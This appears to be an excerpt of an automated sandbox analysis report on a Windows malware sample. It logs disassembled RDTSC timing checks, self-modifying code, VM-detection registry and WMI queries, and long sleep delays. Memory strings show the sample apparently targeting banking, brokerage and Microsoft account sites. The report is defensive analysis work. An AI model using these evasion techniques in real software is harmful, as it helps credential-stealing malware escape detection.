              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10687 second address: 4B1068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B1068C second address: 4B106B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F420070EDEFh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B106B2 second address: 4B10707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F4200FD291Fh 0x0000000b adc esi, 567E4D3Eh 0x00000011 jmp 00007F4200FD2929h 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a mov cx, D623h 0x0000001e push eax 0x0000001f push edx 0x00000020 call 00007F4200FD2926h 0x00000025 pop esi 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10707 second address: 4B1072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F420070EDECh 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F420070EDEEh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B1072A second address: 4B1073C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4200FD291Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B1073C second address: 4B1083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F420070EDF7h 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F420070EDF2h 0x00000017 add cl, FFFFFF88h 0x0000001a jmp 00007F420070EDEBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F420070EDF8h 0x00000026 xor ax, 6AE8h 0x0000002b jmp 00007F420070EDEBh 0x00000030 popfd 0x00000031 popad 0x00000032 call 00007F420070EDF8h 0x00000037 pushfd 0x00000038 jmp 00007F420070EDF2h 0x0000003d or esi, 5CBCC878h 0x00000043 jmp 00007F420070EDEBh 0x00000048 popfd 0x00000049 pop ecx 0x0000004a popad 0x0000004b push eax 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007F420070EDF4h 0x00000053 jmp 00007F420070EDF5h 0x00000058 popfd 0x00000059 pushfd 0x0000005a jmp 00007F420070EDF0h 0x0000005f or ah, 00000038h 0x00000062 jmp 00007F420070EDEBh 0x00000067 popfd 0x00000068 popad 0x00000069 xchg eax, ebx 0x0000006a pushad 0x0000006b push ecx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B1091F second address: 4B10045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 je 00007F42718B0646h 0x0000000c xor eax, eax 0x0000000e jmp 00007F4200FAC04Ah 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 leave 0x00000017 retn 0004h 0x0000001a nop 0x0000001b sub esp, 04h 0x0000001e mov esi, eax 0x00000020 xor ebx, ebx 0x00000022 cmp esi, 00000000h 0x00000025 je 00007F4200FD2A55h 0x0000002b call 00007F4204B5E95Ch 0x00000030 mov edi, edi 0x00000032 pushad 0x00000033 mov ebx, eax 0x00000035 pushfd 0x00000036 jmp 00007F4200FD2924h 0x0000003b or eax, 68942758h 0x00000041 jmp 00007F4200FD291Bh 0x00000046 popfd 0x00000047 popad 0x00000048 xchg eax, ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F4200FD2925h 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10045 second address: 4B1009A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F420070EDF7h 0x00000009 xor eax, 11FD5B7Eh 0x0000000f jmp 00007F420070EDF9h 0x00000014 popfd 0x00000015 mov ah, 81h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F420070EDEAh 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 movsx ebx, cx 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B1009A second address: 4B100A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B100A0 second address: 4B100A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B100A4 second address: 4B100A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B100A8 second address: 4B100CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F420070EDF6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B100CA second address: 4B100D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10C3B second address: 4B10C5E instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F420070EDF9h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10C5E second address: 4B10CE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4200FD2927h 0x00000009 add al, FFFFFFCEh 0x0000000c jmp 00007F4200FD2929h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F4200FD2920h 0x00000018 add eax, 0458C948h 0x0000001e jmp 00007F4200FD291Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov dword ptr [esp], ebp 0x0000002a pushad 0x0000002b call 00007F4200FD2924h 0x00000030 mov ecx, 4BE2D6C1h 0x00000035 pop ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F4200FD291Dh 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10CE9 second address: 4B10D0F instructions: 0x00000000 rdtsc 0x00000002 mov ax, E697h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F420070EDF9h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10D0F second address: 4B10D3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD2921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [7544459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4200FD291Dh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10D3A second address: 4B10D4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4270FDCAA2h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10D4F second address: 4B10D77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, 56h 0x00000005 mov ebx, 3E591136h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4200FD2928h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10D77 second address: 4B10D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10D7D second address: 4B10D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10DB1 second address: 4B10DB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10DB7 second address: 4B10E07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007F4200FD2921h 0x0000000c sbb ch, 00000056h 0x0000000f jmp 00007F4200FD2921h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xor dword ptr [esp], 21BFE015h 0x0000001f jmp 00007F4200FD291Eh 0x00000024 call 00007F42718A768Ch 0x00000029 push 753E2B70h 0x0000002e push dword ptr fs:[00000000h] 0x00000035 mov eax, dword ptr [esp+10h] 0x00000039 mov dword ptr [esp+10h], ebp 0x0000003d lea ebp, dword ptr [esp+10h] 0x00000041 sub esp, eax 0x00000043 push ebx 0x00000044 push esi 0x00000045 push edi 0x00000046 mov eax, dword ptr [75444538h] 0x0000004b xor dword ptr [ebp-04h], eax 0x0000004e xor eax, ebp 0x00000050 push eax 0x00000051 mov dword ptr [ebp-18h], esp 0x00000054 push dword ptr [ebp-08h] 0x00000057 mov eax, dword ptr [ebp-04h] 0x0000005a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000061 mov dword ptr [ebp-08h], eax 0x00000064 lea eax, dword ptr [ebp-10h] 0x00000067 mov dword ptr fs:[00000000h], eax 0x0000006d ret 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 pushad 0x00000073 popad 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10E07 second address: 4B10E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10E0D second address: 4B10E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10E13 second address: 4B10E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10E17 second address: 4B10E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10E1B second address: 4B10E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esi, esi 0x0000000a jmp 00007F420070EDF3h 0x0000000f mov dword ptr [ebp-1Ch], esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F420070EDF5h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20AD8 second address: 4B20B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4200FD2923h 0x0000000a sub esi, 5C9D3D1Eh 0x00000010 jmp 00007F4200FD2929h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20B11 second address: 4B20B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20B17 second address: 4B20B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20B1B second address: 4B20B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a movzx esi, bx 0x0000000d mov si, di 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007F420070EDF9h 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F420070EDEDh 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20B59 second address: 4B20B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20B5E second address: 4B20BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F420070EDEDh 0x0000000a jmp 00007F420070EDEBh 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 mov di, ax 0x00000018 mov ecx, 38732887h 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007F420070EDEDh 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F420070EDECh 0x0000002c and eax, 0AC83168h 0x00000032 jmp 00007F420070EDEBh 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F420070EDF8h 0x0000003e add cx, 83C8h 0x00000043 jmp 00007F420070EDEBh 0x00000048 popfd 0x00000049 popad 0x0000004a mov esi, dword ptr [ebp+0Ch] 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20BED second address: 4B20BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20BF1 second address: 4B20C0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20C0C second address: 4B20C26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test esi, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4200FD291Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20C26 second address: 4B20C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20C2C second address: 4B20CB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD291Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F427189008Eh 0x00000011 pushad 0x00000012 call 00007F4200FD291Ch 0x00000017 mov cx, D501h 0x0000001b pop esi 0x0000001c mov bx, A032h 0x00000020 popad 0x00000021 cmp dword ptr [7544459Ch], 05h 0x00000028 jmp 00007F4200FD2929h 0x0000002d je 00007F42718A8131h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F4200FD2923h 0x0000003c adc ch, FFFFFF8Eh 0x0000003f jmp 00007F4200FD2929h 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20D12 second address: 4B20D3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F420070EDEDh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20D3F second address: 4B20D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4200FD2927h 0x00000008 push ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4200FD2920h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20D71 second address: 4B20D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20DBA second address: 4B20DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20DBE second address: 4B20DC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20DC4 second address: 4B20DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4200FD2926h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSpecial instruction interceptor: First address: FA89E6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSpecial instruction interceptor: First address: 1150B92 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSpecial instruction interceptor: First address: 11D5836 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeCode function: 0_3_006E3D26 sldt word ptr [eax-1AFF8C9Ah]0_3_006E3D26
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow / User API: threadDelayed 1441Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow / User API: threadDelayed 1152Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow / User API: threadDelayed 1637Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow / User API: threadDelayed 537Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWindow / User API: threadDelayed 1000Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7484Thread sleep count: 63 > 30Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7484Thread sleep time: -126063s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7488Thread sleep count: 53 > 30Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7488Thread sleep time: -106053s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7560Thread sleep time: -32000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7588Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7464Thread sleep count: 1441 > 30Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7464Thread sleep time: -2883441s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7468Thread sleep count: 1152 > 30Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7468Thread sleep time: -2305152s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7472Thread sleep count: 1637 > 30Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7472Thread sleep time: -3275637s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7464Thread sleep count: 537 > 30Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7464Thread sleep time: -1074537s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7472Thread sleep count: 1000 > 30Jump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exe TID: 7472Thread sleep time: -2001000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
              Source: b0ho5YYSdo.exe, 00000000.00000002.2342296900.0000000001124000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
              Source: b0ho5YYSdo.exe, b0ho5YYSdo.exe, 00000000.00000002.2340795803.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.1965484060.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230325310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2264629296.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2287190996.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2229792744.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2340795803.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230936460.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2109044489.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2229105379.00000000006E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.000000000553D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
